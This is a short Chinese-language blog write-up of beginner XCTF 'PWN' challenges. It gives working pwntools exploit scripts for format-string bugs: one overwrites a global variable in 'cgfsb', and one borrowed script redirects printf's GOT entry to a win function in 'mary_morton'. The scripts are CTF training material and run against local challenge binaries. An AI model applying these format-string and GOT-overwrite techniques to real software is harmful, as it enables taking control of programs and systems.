XCTF攻防世界-PWNwp

发表于 | 阅读次数:

有一段时间没做pwn了,试试手

新手练习

get-shell

nc过去就可以了

cgfsb

32位栈上printf,一开始忘了searchmem了,都没发现字符串在栈上

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level='debug'
p = process("./cgfsb")
pwnme = 0x0804A068

p.sendline("1111")
p.recv()

payload = fmtstr_payload(10,{pwnme:8})
p.sendline(payload)
p.interactive()

萌新入坑

mary_morton

printf的题,题目给的附件还有问题,没什么兴趣…放个别人的exp吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python

from pwn import *
from formatStringExploiter.FormatString import FormatString
from time import sleep

elf = ELF("./mary_morton")
context.binary = elf

def connect():
    global p
    p = process(elf.file.name)
    p.recvuntil("Exit the battle \n")

def exec_fmt(s):
    print("Sending: " + repr(s))
    p.sendline("2")
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil("1. Stack Bufferoverflow Bug",drop=True)
    p.recvuntil("Exit the battle \n")
    return ret

winner = 0x4008DA
connect()

fmtStr = FormatString(exec_fmt,elf=elf,index=6,pad=0,explore_stack=False)
fmtStr.write_q(elf.symbols['got.printf'], winner)

p.sendline("2")
p.interactive()